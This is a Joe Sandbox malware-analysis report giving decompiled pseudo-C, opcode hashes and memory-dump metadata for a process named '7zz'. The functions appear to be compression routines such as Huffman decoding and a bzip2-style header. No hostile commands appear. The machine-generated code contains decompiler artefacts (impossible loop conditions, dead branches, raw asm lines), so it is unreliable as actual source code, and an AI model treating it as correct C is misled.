0x004537c3
0x004537ca
0x004537cf
0x004537d1
0x004537db
0x004537db
0x004537dc
0x004537dc
0x004537e0
0x004537e3
0x00000000
0x004537a1
0x004537aa
0x004537aa
0x0045375d
0x00453775
0x00453788
0x00000000
0x0045377a
0x00453783
0x00453783
0x00453775
0x0045375b
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bcc24a1de793c7880c776c84e0d37b212a35f96960849a1dcc3f8ba5f3491f
Instruction ID: 1ce2fad126a87967d80d86ee5e08c2d18c52bec30eff92853eb2646f58f4d648
Opcode Fuzzy Hash: c7bcc24a1de793c7880c776c84e0d37b212a35f96960849a1dcc3f8ba5f3491f
Instruction Fuzzy Hash: CDD1CF72600B058BC724DF29C4816A7B3E1FFA4346F54892ED896C7312EB76EA4EC744

Uniqueness

Uniqueness Score: -1.00%

Function 00451050 Relevance: .4, Instructions: 373
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E00451050(void* __ecx) {
				intOrPtr _t134;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				void* _t143;
				void* _t145;
				void* _t147;
				void* _t149;
				signed int _t163;
				intOrPtr* _t182;
				unsigned int _t185;
				intOrPtr* _t189;
				intOrPtr* _t191;
				intOrPtr _t201;
				signed int _t213;
				int _t223;
				void* _t241;
				unsigned int _t244;
				intOrPtr _t246;
				signed int _t247;
				unsigned int _t250;
				unsigned int _t251;
				signed int _t252;
				signed char _t263;
				intOrPtr _t273;
				intOrPtr* _t276;
				intOrPtr* _t281;
				int _t282;
				intOrPtr _t283;
				signed int _t294;
				void* _t301;
				unsigned int _t306;
				void* _t307;
				signed char _t310;
				intOrPtr* _t312;
				void* _t313;
				void* _t316;
				signed int _t318;
				void* _t319;
				intOrPtr* _t320;
				void* _t321;

				_t319 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x1cc0)) != 0) {
					_t201 =  *((intOrPtr*)(__ecx + 8));
					_t276 = __ecx + 8;
					if(_t201 <  *((intOrPtr*)(__ecx + 0xc))) {
						 *_t276 = _t201 + 1;
					} else {
						E0040E070(_t276);
					}
				}
				_t312 = _t319 + 8;
				if( *(_t319 + 0x2c) >= 0x10) {
					do {
						_t189 =  *_t312;
						if(_t189 <  *((intOrPtr*)(_t312 + 4))) {
							 *(_t321 + 0x10) =  *_t189;
							 *_t312 = _t189 + 1;
						} else {
							 *(_t321 + 0x10) = E0040E070(_t312);
						}
						_t191 =  *_t312;
						if(_t191 <  *((intOrPtr*)(_t312 + 4))) {
							 *(_t321 + 0x14) =  *_t191;
							 *_t312 = _t191 + 1;
						} else {
							 *(_t321 + 0x14) = E0040E070(_t312);
						}
						_t273 =  *((intOrPtr*)(_t312 + 0x24)) + 0xfffffff0;
						 *((intOrPtr*)(_t312 + 0x24)) = _t273;
						 *(_t312 + 0x20) = ( *(_t312 + 0x20) << 0x00000008 |  *(_t321 + 0x14) & 0x000000ff) << 0x00000008 |  *(_t321 + 0x10) & 0x000000ff;
					} while (_t273 >= 0x10);
				}
				_t294 = E00450B20(3);
				 *(_t321 + 0x10) = _t294;
				if(_t294 <= 3) {
					if( *((intOrPtr*)(_t319 + 0x1cc1)) == 0) {
						_t134 =  *((intOrPtr*)(_t312 + 0x24));
						 *((intOrPtr*)(_t312 + 0x24)) = _t134 + 0xc;
						E00450FC0(_t312);
						_t137 =  *((intOrPtr*)(_t312 + 0x24));
						 *((intOrPtr*)(_t312 + 0x24)) = _t137 + 0xc;
						_t139 = E00450FC0(_t312);
						 *(_t319 + 0x1cb4) = (( *(_t312 + 0x20) >> 0x0000000f - _t134 >> 0x00000005 & 0x00000fff) << 0xc) + ( *(_t312 + 0x20) >> 0x0000000f - _t137 >> 0x00000005 & 0x00000fff);
						_t294 =  *(_t321 + 0x10);
					} else {
						_t139 = E00450B20(1);
						if(_t139 != 1) {
							_t139 = E00450B20(0x10);
							 *(_t319 + 0x1cb4) = _t139;
						} else {
							 *(_t319 + 0x1cb4) = 0x8000;
						}
					}
					_t140 = _t139 & 0xffffff00 | _t294 == 0x00000003;
					 *(_t319 + 0x68) = _t140;
					if(_t140 == 0 || ( *(_t319 + 0x1cb4) & 0x00000001) == 0) {
						_t223 = 0;
					} else {
						_t223 = 1;
					}
					 *(_t319 + 0x1cc0) = _t223;
					if(_t140 == 0) {
						_t141 = _t140 & 0xffffff00 | _t294 == 0x00000002;
						 *(_t319 + 0x69) = _t141;
						if(_t141 == 0) {
							L52:
							_push(0x100);
							_push(_t321 + 0xa4);
							_push(_t319 + 0x1920);
							_t143 = E00450BD0(_t319);
							if(_t143 != 0) {
								_push( *((intOrPtr*)(_t319 + 0x64)));
								_push(_t321 + 0x1a4);
								_push(_t319 + 0x1a20);
								_t145 = E00450BD0(_t319);
								if(_t145 != 0) {
									_t147 =  *((intOrPtr*)(_t319 + 0x64)) + 0x100;
									if(_t147 < 0x290) {
										_t301 = _t321 + _t147 + 0xa4;
										memset(_t301 + (0x290 - _t147 >> 2), memset(_t301, 0, 0x290 << 2), 0 << 0);
										_t321 = _t321 + 0x18;
									}
									_push(_t321 + 0xa4);
									_t149 = E00451F90(_t319 + 0x6c);
									if(_t149 != 0) {
										_push(0xf9);
										_push(_t321 + 0xa4);
										_push(_t319 + 0x1bb0);
										if(E00450BD0(_t319) != 0) {
											_push(_t321 + 0xa4);
											return E004520E0(_t319 + 0xd34);
										} else {
											goto L61;
										}
									} else {
										return _t149;
									}
								} else {
									return _t145;
								}
							} else {
								return _t143;
							}
						} else {
							_t313 = 0;
							do {
								 *((char*)(_t321 + _t313 + 0xa4)) = E00450B20(3);
								_t313 = _t313 + 1;
							} while (_t313 < 8);
							_t281 = _t319 + 0x1428;
							memset(_t321 + 0x20, 0, 0x10 << 2);
							_t321 = _t321 + 0xc;
							_t306 = 0;
							_t241 = 0;
							while(0 <= 0x10) {
								 *_t281 = 0xffffffff;
								_t241 = _t241 + 1;
								_t281 = _t281 + 4;
								 *((intOrPtr*)(_t321 + 0x1c)) =  *((intOrPtr*)(_t321 + 0x1c)) + 1;
								if(_t241 < 8) {
									continue;
								} else {
									_t163 = 0;
									 *(_t321 + 0x1c) = _t306;
									 *(_t319 + 0x13a0) = _t306;
									 *(_t319 + 0x13e4) = _t306;
									 *(_t321 + 0x10) = 0;
									_t282 = 1;
									while(1) {
										_t316 = _t321 + 0x1c + _t282 * 4;
										_t306 = _t306 + ( *(_t321 + 0x1c + _t282 * 4) << 0x10 - _t282);
										 *(_t321 + 0x18) = _t306;
										if(_t306 > 0x10000) {
											goto L61;
										}
										_t244 = 0x10000;
										if(_t282 != 0x10) {
											_t244 = _t306;
										}
										 *(_t319 + 0x13a0 + _t282 * 4) = _t244;
										_t246 =  *((intOrPtr*)(_t319 + 0x13e0 + _t282 * 4)) +  *((intOrPtr*)(_t316 - 4));
										 *((intOrPtr*)(_t319 + 0x13e4 + _t282 * 4)) = _t246;
										 *((intOrPtr*)(_t321 + 0x60 + _t282 * 4)) = _t246;
										if(_t282 <= 9) {
											_t250 =  *(_t319 + 0x13a0 + _t282 * 4) >> 7;
											if(_t163 < _t250) {
												_t96 = _t319 + 0x1448; // 0x1448
												_t307 = _t163 + _t96;
												_t251 = _t250 - _t163;
												 *(_t321 + 0x14) = _t251;
												_t318 = _t251;
												_t252 = _t251 >> 2;
												memset(_t307 + _t252, memset(_t307, _t282, _t252 << 2), (_t318 & 0x00000003) << 0);
												_t321 = _t321 + 0x18;
												_t306 =  *(_t321 + 0x18);
												_t163 =  *(_t321 + 0x10) + _t318;
												 *(_t321 + 0x10) = _t163;
											}
										}
										_t282 = _t282 + 1;
										if(_t282 <= 0x10) {
											continue;
										} else {
											_t283 = 0;
											do {
												if(0 != 0) {
													_t247 =  *(_t321 + 0x60);
													 *((intOrPtr*)(_t319 + 0x1428 + _t247 * 4)) = _t283;
													 *(_t321 + 0x60) = _t247 + 1;
												}
												_t283 = _t283 + 1;
											} while (_t283 < 8);
											goto L52;
										}
										goto L63;
									}
									goto L61;
								}
								goto L63;
							}
							goto L61;
						}
					} else {
						E00450B20(0x10 - ( *(_t319 + 0x2c) & 0x0000000f));
						if( *((intOrPtr*)(_t312 + 0x24)) != 0) {
							L61:
							return 0;
						} else {
							 *(_t321 + 0x14) = 2;
							 *(_t319 + 0x58) =  *(_t312 + 0x20) >> 0x00000010 |  *(_t312 + 0x20) << 0x00000010;
							 *((intOrPtr*)(_t312 + 0x24)) = 0x20;
							 *(_t319 + 0x58) =  *(_t319 + 0x58) - 1;
							_t320 = _t319 + 0x5c;
							do {
								_t213 = 0;
								_t310 = 0;
								do {
									_t182 =  *_t312;
									if(_t182 <  *((intOrPtr*)(_t312 + 4))) {
										 *(_t321 + 0x10) =  *_t182;
										 *_t312 = _t182 + 1;
									} else {
										 *(_t321 + 0x10) = E0040E070(_t312);
									}
									_t263 = _t310;
									_t310 = _t310 + 8;
									_t213 = _t213 | ( *(_t321 + 0x10) & 0x000000ff) << _t263;
								} while (_t310 < 0x20);
								 *_t320 = _t213 - 1;
								_t320 = _t320 + 4;
								_t185 =  *(_t321 + 0x14) - 1;
								 *(_t321 + 0x14) = _t185;
							} while (_t185 != 0);
							return 1;
						}
					}
				} else {
					return 0;
				}
				L63:
			}

0x00451058
0x00451064
0x00451066
0x0045106c
0x00451071
0x0045107b
0x00451073
0x00451073
0x00451073
0x00451071
0x00451080
0x0045108a
0x00451091
0x00451091
0x00451098
0x004510aa
0x004510ae
0x0045109a
0x004510a1
0x004510a1
0x004510b0
0x004510b7
0x004510c9
0x004510cd
0x004510b9
0x004510c0
0x004510c0
0x004510f1
0x004510f5
0x004510f8
0x004510fd
0x00451091
0x0045110a
0x0045110f
0x00451113
0x0045112a
0x00451156
0x0045116a
0x00451176
0x0045117b
0x0045118f
0x0045119b
0x004511a5
0x004511ab
0x0045112c
0x00451130
0x00451138
0x00451149
0x0045114e
0x0045113a
0x0045113a
0x0045113a
0x00451138
0x004511b2
0x004511b7
0x004511ba
0x004511cc
0x004511c5
0x004511c5
0x004511c5
0x004511d0
0x004511d6
0x00451282
0x00451287
0x0045128a
0x004513d0
0x004513d7
0x004513e2
0x004513e3
0x004513e6
0x004513ed
0x00451404
0x0045140b
0x0045140c
0x0045140f
0x00451416
0x00451426
0x00451430
0x00451437
0x0045144e
0x0045144e
0x0045144e
0x0045145a
0x0045145b
0x00451462
0x00451476
0x00451481
0x00451482
0x0045148c
0x004514a8
0x004514b8
0x00000000
0x00000000
0x00000000
0x0045146e
0x0045146e
0x0045146e
0x00451422
0x00451422
0x00451422
0x004513f9
0x004513f9
0x004513f9
0x00451290
0x00451290
0x00451292
0x0045129b
0x004512a2
0x004512a3
0x004512b3
0x004512b9
0x004512b9
0x004512bb
0x004512bd
0x004512bf
0x004512da
0x004512e0
0x004512e1
0x004512e7
0x004512e9
0x00000000
0x004512eb
0x004512eb
0x004512ed
0x004512f1
0x004512f7
0x004512fd
0x00451301
0x00451306
0x0045130a
0x00451317
0x0045131f
0x00451323
0x00000000
0x00000000
0x0045132c
0x00451331
0x00451333
0x00451333
0x00451338
0x00451346
0x0045134b
0x00451352
0x00451356
0x0045135f
0x00451364
0x00451366
0x00451366
0x0045136d
0x00451371
0x00451377
0x00451383
0x0045138d
0x0045138d
0x00451393
0x00451399
0x0045139b
0x0045139b
0x00451364
0x0045139f
0x004513a3
0x00000000
0x004513a9
0x004513a9
0x004513ab
0x004513b6
0x004513b8
0x004513c0
0x004513c8
0x004513c8
0x004513ca
0x004513cb
0x00000000
0x004513ab
0x00000000
0x004513a3
0x00000000
0x00451306
0x00000000
0x004512e9
0x00000000
0x004512bf
0x004511dc
0x004511ec
0x004511f6
0x00451491
0x0045149a
0x004511fc
0x004511ff
0x00451211
0x00451214
0x0045121f
0x00451222
0x00451225
0x00451225
0x00451227
0x00451229
0x00451229
0x00451230
0x00451242
0x00451246
0x00451232
0x00451239
0x00451239
0x0045124c
0x00451254
0x00451259
0x0045125b
0x00451265
0x00451268
0x0045126b
0x0045126c
0x0045126c
0x0045127e
0x0045127e
0x004511f6
0x00451118
0x00451121
0x00451121
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a7e5d09e26d5753100cc2568189196292b632a231a3296cbee244cacba0436a
Instruction ID: 7ffc51f0b6ed8d7e1b84f6e78e82dd49a9c305e9cdf2e8039c63d13bff25686b
Opcode Fuzzy Hash: 5a7e5d09e26d5753100cc2568189196292b632a231a3296cbee244cacba0436a
Instruction Fuzzy Hash: 45D1F1327043454FDB28CE68D8907EEB7D2ABC9305F44093EED8AC7782D678A949C795

Uniqueness

Uniqueness Score: -1.00%

Function 00449460 Relevance: .3, Instructions: 343
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00449460(intOrPtr __ecx) {
				signed char _t107;
				signed char _t110;
				signed char _t133;
				signed char _t134;
				signed int _t137;
				signed int _t139;
				signed char _t141;
				signed char _t143;
				signed char _t148;
				signed char _t149;
				signed char _t158;
				signed char _t160;
				signed char _t169;
				signed char _t170;
				signed char _t185;
				signed char _t186;
				signed char _t189;
				signed char _t219;
				intOrPtr _t251;
				intOrPtr _t257;
				intOrPtr* _t264;
				signed char _t265;
				void* _t267;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed char _t274;
				void* _t275;
				void* _t276;
				signed char _t277;
				void* _t278;
				intOrPtr _t279;
				void* _t280;

				_push(0xffffffff);
				_push(E00479538);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t279;
				_t280 = _t279 - 0x10;
				_t269 = __ecx;
				 *((intOrPtr*)(__ecx + 0x1b0)) =  *((intOrPtr*)(_t279 + 0x20));
				_t107 = E004481D0(__ecx);
				if(_t107 == 0) {
					_t185 = 0;
					if( *((intOrPtr*)(__ecx + 0x198)) <= 0) {
						L9:
						_t273 = _t269 + 0x20;
						if(E0040DF95(_t273, 0x20000) != 0) {
							_t264 = _t269 + 0x140;
							_t110 = E0040EE76(_t264, 0x20000);
							__eflags = _t110;
							if(_t110 != 0) {
								_t251 =  *((intOrPtr*)(_t280 + 0x30));
								E0040DFE4(_t273, _t251);
								E0040DFF3(_t273);
								E0040EEC1(_t264,  *((intOrPtr*)(_t280 + 0x34)));
								E0040EED0(_t264);
								 *(_t264 + 0x28) = 8;
								 *(_t264 + 0x2c) = 0;
								 *((intOrPtr*)(_t280 + 0x30)) = _t269;
								_t186 = 0;
								 *((intOrPtr*)(_t280 + 0x28)) = 0;
								 *((intOrPtr*)(_t269 + 0x174)) = 0;
								 *((intOrPtr*)(_t269 + 0x1a0)) = 0;
								 *((char*)(_t269 + 0x1a5)) = 0;
								 *((char*)(_t269 + 0x1a4)) = 0;
								E00467B30(_t269 + 0x1a8);
								E004486E0(0x42);
								E004486E0(0x5a);
								E004486E0(0x68);
								E004486E0( *((intOrPtr*)(_t269 + 0x10)) + 0x30);
								__eflags =  *(_t269 + 0x19c);
								if( *(_t269 + 0x19c) == 0) {
									_t187 =  *((intOrPtr*)(_t269 + 0x178));
									__eflags = E00448490(_t269,  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x178)))));
									if(__eflags == 0) {
										L31:
										_t186 = 0;
										__eflags = 0;
										goto L32;
									} else {
										while(1) {
											_t189 = E00449200(_t187, __eflags, _t123);
											__eflags = _t189;
											if(_t189 != 0) {
												break;
											}
											__eflags =  *(_t280 + 0x40);
											if( *(_t280 + 0x40) == 0) {
												L30:
												_t187 =  *((intOrPtr*)(_t269 + 0x178));
												_t251 =  *((intOrPtr*)( *((intOrPtr*)(_t269 + 0x178))));
												__eflags = E00448490(_t269, _t251);
												if(__eflags != 0) {
													continue;
												} else {
													goto L31;
												}
											} else {
												asm("cdq");
												asm("adc edx, ecx");
												 *((intOrPtr*)(_t280 + 0x18)) =  *_t273 -  *((intOrPtr*)(_t273 + 8)) +  *((intOrPtr*)(_t273 + 0x10));
												 *((intOrPtr*)(_t280 + 0x1c)) = _t251;
												 *((intOrPtr*)(_t280 + 0x10)) = E0040EEE8(_t264) + (0xf -  *(_t264 + 0x28) >> 3);
												_t158 =  *(_t280 + 0x40);
												asm("adc edx, ebx");
												 *((intOrPtr*)(_t280 + 0x18)) = _t251;
												_t189 =  *((intOrPtr*)( *_t158 + 0xc))(_t158, _t280 + 0x1c, _t280 + 0x10);
												__eflags = _t189;
												if(_t189 != 0) {
													_t160 =  *(_t269 + 0x2c);
													 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
													__eflags = _t160;
													if(_t160 != 0) {
														 *((intOrPtr*)( *_t160 + 8))(_t160);
														 *(_t269 + 0x2c) = 0;
													}
													_t149 =  *(_t269 + 0x154);
													__eflags = _t149;
													if(_t149 != 0) {
														L53:
														 *((intOrPtr*)( *_t149 + 8))(_t149);
														 *(_t269 + 0x154) = 0;
													}
													L54:
													_t107 = _t189;
												} else {
													goto L30;
												}
											}
											goto L55;
										}
										_t148 =  *(_t269 + 0x2c);
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										__eflags = _t148;
										if(_t148 != 0) {
											 *((intOrPtr*)( *_t148 + 8))(_t148);
											 *(_t269 + 0x2c) = 0;
										}
										_t149 =  *(_t269 + 0x154);
										__eflags = _t149;
										if(_t149 != 0) {
											goto L53;
										}
										goto L54;
									}
								} else {
									E00467B10( *((intOrPtr*)(_t269 + 0x178)) + 0x8cf0);
									 *(_t269 + 0x1ac) = 0;
									E00467B10(_t269 + 0x17c);
									_t275 = 0;
									__eflags =  *(_t269 + 0x198);
									if( *(_t269 + 0x198) > 0) {
										do {
											E00467AC0( *((intOrPtr*)(_t186 +  *((intOrPtr*)(_t269 + 0x178)) + 0x8ce8)));
											_t275 = _t275 + 1;
											_t186 = _t186 + 0x8e00;
											__eflags = _t275 -  *(_t269 + 0x198);
										} while (_t275 <  *(_t269 + 0x198));
										_t186 = 0;
										__eflags = 0;
									}
									E00467B30(_t269 + 0x17c);
									E00467B10(_t269 + 0x1a8);
									_t276 = 0;
									__eflags =  *(_t269 + 0x198) - _t186;
									if( *(_t269 + 0x198) > _t186) {
										do {
											E00467AC0( *((intOrPtr*)(_t186 +  *((intOrPtr*)(_t269 + 0x178)) + 0x8cec)));
											_t276 = _t276 + 1;
											_t186 = _t186 + 0x8e00;
											__eflags = _t276 -  *(_t269 + 0x198);
										} while (_t276 <  *(_t269 + 0x198));
										_t186 = 0;
										__eflags = 0;
									}
									E00467B30(_t269 + 0x1a8);
									_t277 =  *(_t269 + 0x1ac);
									__eflags = _t277 - _t186;
									if(_t277 == _t186) {
										L32:
										E004486E0(0x17);
										E004486E0(0x72);
										E004486E0(0x45);
										E004486E0(0x38);
										E004486E0(0x50);
										E004486E0(0x90);
										E00448700(_t269,  *((intOrPtr*)(_t269 + 0x174)));
										_t274 =  *(_t264 + 0x28);
										__eflags = _t274 - 8;
										if(_t274 < 8) {
											__eflags = _t274;
											if(_t274 > 0) {
												while(1) {
													_t137 =  *(_t264 + 0x28);
													__eflags = _t274 - _t137;
													if(_t274 < _t137) {
														break;
													}
													_t274 = _t274 - _t137;
													_t219 = _t274;
													_t143 = _t186 >> _t219;
													_t186 = _t186 - (_t143 << _t219);
													 *( *((intOrPtr*)(_t264 + 4)) +  *_t264) =  *(_t264 + 0x2c) | _t143;
													_t257 =  *((intOrPtr*)(_t264 + 4)) + 1;
													 *((intOrPtr*)(_t264 + 4)) = _t257;
													__eflags = _t257 -  *((intOrPtr*)(_t264 + 8));
													if(__eflags == 0) {
														E0040EFBD(_t264, __eflags);
													}
													__eflags = _t274;
													 *(_t264 + 0x28) = 8;
													 *(_t264 + 0x2c) = 0;
													if(_t274 > 0) {
														continue;
													} else {
													}
													goto L40;
												}
												_t139 =  *(_t264 + 0x28) - _t274;
												 *(_t264 + 0x28) = _t139;
												_t141 =  *(_t264 + 0x2c) | _t186 << _t139;
												__eflags = _t141;
												 *(_t264 + 0x2c) = _t141;
											}
											L40:
											_t186 = 0;
											__eflags = 0;
										}
										_t265 = E0040EFA1(_t264);
										_t133 =  *(_t269 + 0x2c);
										__eflags = _t133 - _t186;
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										if(_t133 != _t186) {
											 *((intOrPtr*)( *_t133 + 8))(_t133);
											 *(_t269 + 0x2c) = _t186;
										}
										_t134 =  *(_t269 + 0x154);
										__eflags = _t134 - _t186;
										if(_t134 != _t186) {
											 *((intOrPtr*)( *_t134 + 8))(_t134);
											 *(_t269 + 0x154) = _t186;
										}
										_t107 = _t265;
									} else {
										_t169 =  *(_t269 + 0x2c);
										 *((intOrPtr*)(_t280 + 0x28)) = 0xffffffff;
										__eflags = _t169 - _t186;
										if(_t169 != _t186) {
											 *((intOrPtr*)( *_t169 + 8))(_t169);
											 *(_t269 + 0x2c) = _t186;
										}
										_t170 =  *(_t269 + 0x154);
										__eflags = _t170 - _t186;
										if(_t170 != _t186) {
											 *((intOrPtr*)( *_t170 + 8))(_t170);
											 *(_t269 + 0x154) = _t186;
										}
										_t107 = _t277;
									}
								}
							} else {
								goto L12;
							}
						} else {
							_t107 = 0x8007000e;
						}
					} else {
						_t278 = 0;
						do {
							_t267 = _t278 +  *((intOrPtr*)(_t269 + 0x178));
							if( *(_t269 + 0x19c) == 0) {
								L7:
								 *((char*)(_t267 + 0x8cdc)) =  *((intOrPtr*)(_t269 + 0x14));
								if(E00447C30(_t267) == 0) {
									L12:
									_t107 = 0x8007000e;
								} else {
									goto L8;
								}
							} else {
								_t6 = _t267 + 0x8ce8; // 0x8ce8
								_t107 = E00467B30(_t6);
								if(_t107 == 0) {
									_t7 = _t267 + 0x8cec; // 0x8cec
									_t107 = E00467B30(_t7);
									if(_t107 == 0) {
										_t8 = _t267 + 0x8cf0; // 0x8cf0
										_t107 = E00467B30(_t8);
										if(_t107 == 0) {
											goto L7;
										}
									}
								}
							}
							goto L55;
							L8:
							_t185 = _t185 + 1;
							_t278 = _t278 + 0x8e00;
						} while (_t185 <  *(_t269 + 0x198));
						goto L9;
					}
				}
				L55:
				 *[fs:0x0] =  *((intOrPtr*)(_t280 + 0x20));
				return _t107;
			}

0x00449466
0x00449468
0x0044946d
0x0044946e
0x00449479
0x0044947f
0x00449482
0x00449488
0x0044948f
0x0044949b
0x0044949f
0x00449515
0x00449515
0x00449526
0x00449532
0x0044953f
0x00449544
0x00449546
0x00449552
0x00449559
0x00449560
0x0044956c
0x00449573
0x00449578
0x0044957f
0x00449583
0x00449587
0x0044958f
0x00449593
0x00449599
0x0044959f
0x004495a5
0x004495ab
0x004495b4
0x004495bd
0x004495c6
0x004495d4
0x004495df
0x004495e1
0x004496dd
0x004496ed
0x004496ef
0x00449782
0x00449782
0x00449782
0x00000000
0x004496f5
0x004496f5
0x004496fd
0x004496ff
0x00449701
0x00000000
0x00000000
0x0044970b
0x0044970d
0x0044976a
0x0044976a
0x00449772
0x0044977a
0x0044977c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044970f
0x0044971d
0x00449720
0x00449724
0x00449728
0x00449746
0x0044974a
0x0044974e
0x00449755
0x00449760
0x00449762
0x00449764
0x0044989a
0x0044989d
0x004498a5
0x004498a7
0x004498ac
0x004498af
0x004498af
0x004498b6
0x004498bc
0x004498be
0x004498c0
0x004498c3
0x004498c6
0x004498c6
0x004498d0
0x004498d0
0x00000000
0x00000000
0x00000000
0x00449764
0x00000000
0x0044970d
0x00449872
0x00449875
0x0044987d
0x0044987f
0x00449884
0x00449887
0x00449887
0x0044988e
0x00449894
0x00449896
0x00000000
0x00449898
0x00000000
0x00449896
0x004495e7
0x004495f3
0x004495fe
0x00449604
0x0044960f
0x00449611
0x00449613
0x00449615
0x00449629
0x00449634
0x00449635
0x0044963b
0x0044963b
0x0044963f
0x0044963f
0x0044963f
0x00449647
0x00449652
0x0044965d
0x0044965f
0x00449661
0x00449663
0x00449677
0x00449682
0x00449683
0x00449689
0x00449689
0x0044968d
0x0044968d
0x0044968d
0x00449695
0x0044969a
0x004496a0
0x004496a2
0x00449784
0x00449788
0x00449791
0x0044979a
0x004497a3
0x004497ac
0x004497b8
0x004497c6
0x004497cb
0x004497ce
0x004497d1
0x004497d3
0x004497d5
0x004497d7
0x004497d7
0x004497da
0x004497dc
0x00000000
0x00000000
0x004497de
0x004497e2
0x004497e4
0x004497f2
0x004497f6
0x004497ff
0x00449802
0x00449805
0x00449807
0x0044980b
0x0044980b
0x00449810
0x00449812
0x00449819
0x0044981d
0x00000000
0x00000000
0x0044981f
0x00000000
0x0044981d
0x00449824
0x00449828
0x00449830
0x00449830
0x00449832
0x00449832
0x00449835
0x00449835
0x00449835
0x00449835
0x0044983e
0x00449840
0x00449843
0x00449845
0x0044984d
0x00449852
0x00449855
0x00449855
0x00449858
0x0044985e
0x00449860
0x00449865
0x00449868
0x00449868
0x0044986e
0x004496a8
0x004496a8
0x004496ab
0x004496b3
0x004496b5
0x004496ba
0x004496bd
0x004496bd
0x004496c0
0x004496c6
0x004496c8
0x004496cd
0x004496d0
0x004496d0
0x004496d6
0x004496d6
0x004496a2
0x00000000
0x00000000
0x00000000
0x00449528
0x00449528
0x00449528
0x004494a1
0x004494a1
0x004494a3
0x004494b1
0x004494b5
0x004494f0
0x004494f3
0x00449502
0x00449548
0x00449548
0x00000000
0x00000000
0x00000000
0x004494b7
0x004494b7
0x004494bd
0x004494c4
0x004494ca
0x004494d0
0x004494d7
0x004494dd
0x004494e3
0x004494ea
0x00000000
0x00000000
0x004494ea
0x004494d7
0x004494c4
0x00000000
0x00449504
0x0044950a
0x0044950b
0x00449511
0x00000000
0x004494a3
0x0044949f
0x004498d2
0x004498da
0x004498e4

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ErrorEventLast$ObjectResetSingleWait
String ID:
API String ID: 2703132900-0
Opcode ID: 0079d454e35e10e96df4d7af03ea51e438f51775e4882a6c1d798cc27c30d208
Instruction ID: cb7edc23985cc21b463dff47bc8f4930bbb377ff39c12e3229b9d5c30bfef748
Opcode Fuzzy Hash: 0079d454e35e10e96df4d7af03ea51e438f51775e4882a6c1d798cc27c30d208
Instruction Fuzzy Hash: FBD16030304B059BE714EF79C490AABB7E5BF45318F044A2EE59A87781DB38AC45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00450BD0 Relevance: .3, Instructions: 309
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00450BD0(void* __ecx) {
				intOrPtr _t141;
				char* _t146;
				void* _t149;
				void* _t151;
				intOrPtr* _t153;
				intOrPtr* _t167;
				intOrPtr* _t169;
				int _t190;
				signed int _t191;
				void* _t202;
				unsigned int _t205;
				intOrPtr _t207;
				signed int _t208;
				char* _t210;
				intOrPtr _t215;
				intOrPtr _t244;
				intOrPtr _t247;
				unsigned int _t249;
